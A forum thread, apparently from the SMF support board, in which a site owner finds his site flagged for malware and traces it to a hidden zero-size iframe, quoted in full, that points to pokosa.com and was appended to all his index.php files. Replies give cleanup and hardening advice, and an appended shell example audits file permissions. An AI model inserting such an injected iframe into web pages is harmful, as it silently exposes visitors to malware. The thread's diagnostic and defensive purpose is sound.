My site has been infected with Malware called pokosa :(

Started by agent47, February 07, 2012, 05:35:24 AM


agent47

Guys my site was doing perfectly fine until today when my browser started bringing up this error:

Warning: Something's Not Right Here!
www {dot} superheroalliance {dot} net contains content from pokosa.com, a site known to distribute malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified pokosa.com that we found malware on the site. For more about the problems found on pokosa.com, visit the Google Safe Browsing diagnostic page.

Please tell me how this can be resolved as it seems to be frightening away my members :'(
I don't know what has caused this but it sure as hell is making me sad. Kindly help me out with this someone.

PortaMx is probably the best SMF portal!

agent47

So I did a view page source of my site and found this at the end:

<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

The question is how do I remove as in which file should I look into in order to remove this link?

Edited by K@ to add...

IF ANYONE'S CURIOUS AND WANTS TO CLICK ON THE LINK IN THIS POST... DON'T!


Illori

Check which files have been recently edited and go from there.

青山 素子

Quote from: floridaflatlander on February 07, 2012, 09:10:17 AM
How did this get there in the first place?

There are many ways. Brute-forcing of FTP or other credentials, exploit of a different software on the same account, exploit of a different site on the same server if the server is poorly-secured, server-level security breach, ...
Motoko-chan
Director, Simple Machines



Xarcell

It would be nice to know how this happened, so others can try to avoid the same situation.

agent47

Quote from: Xarcell on February 08, 2012, 04:13:07 PM
It would be nice to know how this happened, so others can try to avoid the same situation.
If I knew I would explain mate but only today did I discover that ALL my index.php files seem to be affected. It has basically appended the following line:
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe> onto all of my index.php files and I mean all so now I have to manually remove them from each of the files :(
Wish I knew how this happened.


Roph

It isn't enough to just clean it up. The fact that it's been done proves that you are somehow vulnerable. It's important that you close the vulnerability by which they got in.

You should also check the .htaccess files in your account, they are another common target of malicious edits to try and slip by nasty stuff.

Think about all the other scripts you have installed, besides SMF, and check their versions. If any have new versions available, update them. You should also check through all .php scripts, not just index.php scripts. Look at their last modified times, or look for new files with strange names.

NanoSector

Also change all of your passwords. Wait with that one until you've fixed all the others that Roph mentioned, though, as the chance of this happening twice is quite big if you don't close the holes.

tumbleweed

Looks like an iframe hack. Without a clear inventory of what is in the OP's web space (in relation to other software) it is hard to tell how they got in.

Lawrence Wright

Double check your directory permissions. Remember,

0644 For Files
0755 For Directories

Also make sure you're not running any unconfigured web based file editors.

Illori

Not all servers will have the files writable to the server with 644 and 755. You are best to contact your host, or even better not have the files writable to the server unless you are installing mods.
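A permissions audit for the 0644 / 0755 baseline Lawrence Wright gives, written as an added shell example that is not code from the thread. It builds a constructed sample tree and assumes one directory, `attachments`, that must stay writable; as Illori notes, whether 644 is enough depends on which user PHP runs as on your host, so confirm that before pointing lock_down at a live site.

```shell
#!/bin/sh
# Added example, not code from the thread: audit a web tree against the
# 0644 / 0755 baseline Lawrence Wright gives, list what is world-writable,
# and lock the tree down while keeping the one directory SMF must write to.
# The sample tree, its paths and the "attachments" allowlist are constructed
# assumptions for the demo; Illori's caveat applies, so check with your host
# before applying lock_down to a live site.

# Constructed sample: a clean file, a world-writable source file, and an
# attachments directory left 777 as shared hosts often require.
make_sample_tree() {
    root=$(mktemp -d); chmod 755 "$root"
    mkdir -p "$root/Sources" "$root/attachments"
    : > "$root/index.php";         chmod 644 "$root/index.php"
    : > "$root/Sources/Load.php";  chmod 666 "$root/Sources/Load.php"   # anyone on the box can edit it
    chmod 755 "$root/Sources"
    chmod 777 "$root/attachments"
    echo "$root"
}

# Everything that deviates from the baseline (exact-mode match, so 600 or
# 664 files and 700 or 775 directories are reported too).
off_baseline() {       # usage: off_baseline ROOT
    find "$1" -type f ! -perm 644
    find "$1" -type d ! -perm 755
}

# The dangerous subset: anything with the other-write bit set. On a shared
# host this is writable by every account on the box, not just the web server.
world_writable() {     # usage: world_writable ROOT
    find "$1" -perm -002
}

# Illori: keep files non-writable unless you are installing mods. Reset the
# tree to the baseline but prune one directory that must stay writable.
lock_down() {          # usage: lock_down ROOT KEEP_DIR (relative to ROOT)
    find "$1" -path "$1/$2" -prune -o -type f -exec chmod 644 {} +
    find "$1" -path "$1/$2" -prune -o -type d -exec chmod 755 {} +
}

TREE=$(make_sample_tree)
echo "== off baseline before";   off_baseline "$TREE"
echo "== world-writable before"; world_writable "$TREE"
lock_down "$TREE" attachments
echo "== world-writable after (only the allowlisted directory should remain)"
world_writable "$TREE"
```

On hosts where PHP runs as your own account (suPHP or a per-user FastCGI pool), 644 still lets the web server rewrite every file you own, because the owner bit is what matters there; that is why Illori suggests making files writable only while installing mods. The allowlist in lock_down is how to keep the one directory SMF needs while everything else stays read-only to the server.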
